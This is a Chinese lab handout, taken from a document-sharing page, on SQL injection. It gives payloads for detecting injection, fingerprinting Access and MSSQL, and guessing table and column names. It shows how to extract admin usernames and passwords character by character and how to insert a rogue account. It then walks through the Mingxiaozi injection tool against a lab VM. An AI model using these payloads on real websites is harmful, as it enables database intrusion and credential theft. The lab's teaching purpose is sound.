版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、课程编写类别内容实验课题名称HTTP攻击与防范-SQL注入攻击-03明小子工具实例实验目的与要求1、了解常用web 脚本2、了解常用web 脚本漏洞的利用点实验环境VPC1(虚拟PC)操作系统类型:windows,网络接口:本地连接VPC1 连接要求PC 网络接口,本地连接与实验网络直连软件描述1、学生机要求安装java环境2、vpc安装windows 2003实验环境描述1、学生机与实验室网络直连;2、VPC1与实验室网络直连;3、学生机与VPC1物理链路连通;预备知识1、类型:数字型:and 1=1 and 1=2 判断是否存在注入字符型:' and '1'=
2、9;1 ' and '1'='2搜索型: 关键字%' and 1=1 and '%'='% 关键字%' and 1=2 and '%'='%2、IIS报错情况下使用:and user>0 (判断是ACCESS还是MSSQL)不报错则使用各自数据库特性来判断and (select count(*) from msysobjects)>0 (返回权限不足access数据库)and (select count(*) from sysobjects)>0 (返回正常则为MSSQL数据库)a
3、nd db_name()>0 (返回数据库名)and 0<>(select version)- (判断版本信息)and db_name()>0 (返回数据库名)*注意:猜解之前先要找到后台地址,不然白忙了*3、ACCESS注入:猜解表名(正常则存在admin,不正常则不存在)and exists (select * from admin)and (Select Count(*) from Admin)>0猜解字段:(字段username存在则正常,不正常则不存在)and (Select username from Admin)>0and exists (se
4、lect username from admin)猜解用户名和密码长度and (select top 1 len(username) from Admin)>0and (select top 1 len(password) from Admin)>04、原理:如果top 1的username长度大于0,则条件成立;接着就是>1、>2、>3这样测试下去,一直到条件不成立为止,比如>4成立,>5不成立,就是len(username)=5,即用户名长度为5.得到username的长度后,用mid(username,N,1)截取第N位字符,再asc(mid(u
5、sername,N,1)得到ASCII码.猜解用户and (select top 1 asc(mid(username,1,1) from Admin)>0,1,2,当输入到109时,显示错误,而108之前显示正确,说明第一个字符的ASCII码为109,得到第一个字符是m。同理and (select top 1 asc(mid(username,2,1) from Admin)>0,1,2到114的时候不成立,说明第二个字符的ASCII码值为114,字符为r。注意的是英文和数字的ASCII码在1-128之间.MSSQL注入:having 1=1- 【爆出一个表名及字段,如:列
6、39;users.ID' 在选择列表中无效】group by users.ID having 1=1-group by users.ID, users.username, users.password, users.privs having 1=1-; insert into users values( 666, attacker, foobar, 0xffff )- 【插入新记录】猜解表名:SQL SERVER的每一个数据库都会有用户表和系统表,在系统表sysobjects中, 数据库内创建的每个对象(约束、默认值、日志、规则、存储过程等)在sysobjects表中占一行,那么也就是
7、说当前数据库的表名都会在该表内有存在。我们常用到的参数有三个,name (数据表的名字),xtype( 数据表的类型 u为用户表),id( 数据表的对象标志)。and (select top 1 name from sysobjects where xtype='u')>0 (得到第一个表名:比如user)and (select top 1 name from sysobjects where xtype='u' and name not in ('user')>0 得到第二个表名,后面的以此类推。猜解列名:用到系统自带的2个函数co
8、l_name()和object_id(),col_name()的格式是“COL_NAME( table_id , column_id )”,参数table_id是表的标识号,column_id是列的标识号,object_id(admin)就是得到admin在sysobjects 中的标识号,column_id=1,2,3表明admin的第1,2,3列。and (select top 1 col_name(object_id('admin'),1) from sysobjects)>0 【得到admin字段的第一个列名“username”依次类推,得到“password”“
9、id”等等】猜解字段内容:and (select top 1 username from admin)>0 【直接得到用户名】and (select top 1 password from admin)>0 【直接得到密码】UNION联合查询:select name,password,id from user union select user,pwd,uid from 表名and 1=1 union select 1,2,3,4,5. from 表名 (数值从1开始慢慢加,如果加到5返回正常,那就存在5个字段)5、ASCII逐字解码法:1、猜解列长度and (select top
10、 1 len(列名)from 表名)>N其中N是数字,变换这个N的值猜解列长度,当N为6正确,为7错误,则长度为7猜解第二条记录就该使用:select top 1 len(列名) from 表名 where 列名 not in (select top 1 列名 from 表名)2、猜解用户和密码ASC()函数和Mid函数,ASC(mid(列名,N,1)得到“列名”第N位字符ASCII码猜解语句为:and (select top 1 asc(mid(字段,1,1) from 数据库名)>ASCII码区间判断语句:.between.and.中文处理法:当ASCII转换后为“负数”使用a
11、bs()函数取绝对值。例:and (select top 1 abs(asc(mid(字段,1,1) from 数据库名)=ASC码ASCII逐字解码法的应用:1、猜解表名:and (select count(*) from admin)<>02、猜解列名:and (select count(列名) from 表名)<>03、猜解用户个数:and (select count(*) from 表名)>1,2. 2正常,3错误,表中有3条记录。4、猜解用户名的长度:and (select len(列名) from 表名)>=1、>=2、>=3、>
12、;=4。5、猜解用户名:and (select count(*)from 表名 where (asc(mid(列名,1,1) between 30 and 130)<>0最后提交:and (select asc(mid(列名,1,1) from 表名)=ascii的值6、猜解管理员的密码:按照上面的原理,把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到密码了。实验内容1、 掌握SQL注入基本手段2、 了解WEB站点的脆弱性3、 修复存在SQL注入可能的漏洞实验步骤l 实验操作1、 学生单击实验拓扑按钮,进入实验场景,(第一次启动目标主机,还需要安装j
13、ava控件)。,2、 学生输入账号administrator,密码123456,登录到实验场景中的目标主机。如图所示:3、 打开IE浏览器,登录网站。如图所示:4、 打开d:tools文件夹中的明小子4.0压缩包,点击明小子4.0文件进入后,双击domain4.0.exe。如图所示:5、双击domian4.0.exe6、点击关闭7、 在当前路径中输入,并点击连接。如图所示:注意 注入点区域,您可以发现SQL注入点。8、右键“注入点”中的红色网址。9、 点击检测注入,进入如图所示页面,点击开始检测。10、点击“猜解表名”11、获得数据库admin,选中admin,点击猜解列名。12、勾选上username、
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 广州减电费通知书
- 广工提前返校通知书
- 店铺关门整改通知书
- 康宁府延期交房通知书
- 延吉暂缓返校通知书
- 开发区停电堵车通知书
- 开学通知班主任通知书
- 彭水划片区停电通知书
- 徐州未来城上房通知书
- 2024年奉节县辅警协警招聘考试备考题库及一套答案详解
- 2025年广西南宁铁路局招聘1896人历年高频重点提升(共500题)附带答案详解
- 浙江省温州市第二十三中学2024-2025学年七年级上学期期中检测科学试卷
- 某水毁修复工程施工组织方案设计
- 《离散数学及其应用》全套教学课件
- 尿潴留的中医护理进展
- 国家职业技术技能标准 X2-10-07-23 色彩搭配师 人社厅发2011104号
- 《 被动运输 》参考课件
- 2023年全国职业院校技能大赛-智能财税基本技能赛项规程
- QC/T 1206.2-2024电动汽车动力蓄电池热管理系统第2部分:液冷系统
- 技术人员聘用兼职合同范本
- JBT 6434-2024 输油齿轮泵(正式版)
评论
0/150
提交评论